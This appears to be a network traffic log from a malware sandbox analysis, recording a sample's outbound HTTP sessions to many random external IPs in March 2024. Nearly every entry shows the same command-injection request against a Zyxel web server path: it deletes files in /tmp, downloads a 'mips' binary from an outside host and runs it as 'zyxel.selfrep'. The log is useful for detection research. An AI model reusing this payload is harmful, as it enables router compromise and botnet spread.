                        Mar 12, 2024 08:50:27.039856911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        956192.168.2.145120627.213.177.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039917946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        957192.168.2.1454570180.195.80.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039947033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        958192.168.2.1452504219.105.29.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039963961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        959192.168.2.1446236117.152.138.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039995909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        960192.168.2.1445858196.184.171.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040057898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        961192.168.2.146027653.77.28.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040091991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        962192.168.2.144748435.224.19.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040159941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        963192.168.2.1435872139.206.114.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040205956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        964192.168.2.144275648.3.53.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040246964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        965192.168.2.143951679.86.97.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040297031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        966192.168.2.145681075.47.16.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040334940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        967192.168.2.144314677.221.22.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040399075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        968192.168.2.1443260201.89.123.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040422916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        969192.168.2.143741279.178.55.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040467978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        970192.168.2.1450762123.11.133.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040513992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        971192.168.2.1439782118.209.75.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040587902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        972192.168.2.1455244117.246.146.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040610075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        973192.168.2.1440118199.61.109.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040658951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        974192.168.2.144515667.123.144.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040709019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        975192.168.2.144165219.158.195.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040759087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        976192.168.2.1443102106.126.115.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040823936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        977192.168.2.145936444.254.130.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040855885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        978192.168.2.1459484161.103.228.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040895939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        979192.168.2.1449080146.10.2.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040937901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        980192.168.2.143387095.185.113.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040954113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        981192.168.2.1444592194.184.206.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.040991068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        982192.168.2.144384618.92.6.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041026115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        983192.168.2.1458532114.82.225.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041053057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        984192.168.2.1445076199.45.147.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041112900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        985192.168.2.144212464.76.56.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041117907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        986192.168.2.1445612108.37.166.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041148901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        987192.168.2.145292669.119.229.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041168928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        988192.168.2.1456794212.91.239.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041209936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        989192.168.2.1446958196.99.238.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041261911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        990192.168.2.1450836124.161.191.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041301012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        991192.168.2.1460900198.167.101.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041356087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        992192.168.2.1460744182.137.141.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041382074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        993192.168.2.1435372179.255.55.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041419983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        994192.168.2.1459366120.104.249.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041460037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        995192.168.2.1440724170.32.201.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041503906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        996192.168.2.145286668.119.96.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041553020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        997192.168.2.1452810193.159.73.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041578054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        998192.168.2.1458642175.138.110.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041619062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        999192.168.2.1432800148.57.125.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041657925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1000192.168.2.1440868129.133.44.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041692019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1001192.168.2.144197879.16.70.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041722059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1002192.168.2.1448892186.35.49.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041768074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1003192.168.2.144702473.243.144.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041815042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1004192.168.2.1458108135.177.24.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041841984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1005192.168.2.144269234.144.177.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041872978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1006192.168.2.1434304183.250.78.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041914940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1007192.168.2.1449406223.60.215.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041930914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1008192.168.2.144413691.233.93.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.041981936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1009192.168.2.1457970108.182.217.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042021990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1010192.168.2.144558294.70.72.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042056084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1011192.168.2.1439676153.15.232.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042107105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1012192.168.2.1437514217.246.210.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042145014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1013192.168.2.1441120191.178.191.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042176008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1014192.168.2.1444054148.206.58.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042224884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1015192.168.2.1446408176.116.164.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042278051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1016192.168.2.1457270151.233.101.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042316914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1017192.168.2.143503614.59.68.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042352915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1018192.168.2.144381892.153.227.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042398930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1019192.168.2.1454530126.216.85.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042445898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1020192.168.2.1460896145.147.188.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042489052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1021192.168.2.143404820.24.247.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042556047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1022192.168.2.1455714157.245.5.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042597055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1023192.168.2.1441458219.26.216.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042628050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1024192.168.2.14526321.44.97.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.042706013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1025192.168.2.1454666160.247.183.77443
                        TimestampBytes transferredDirectionData
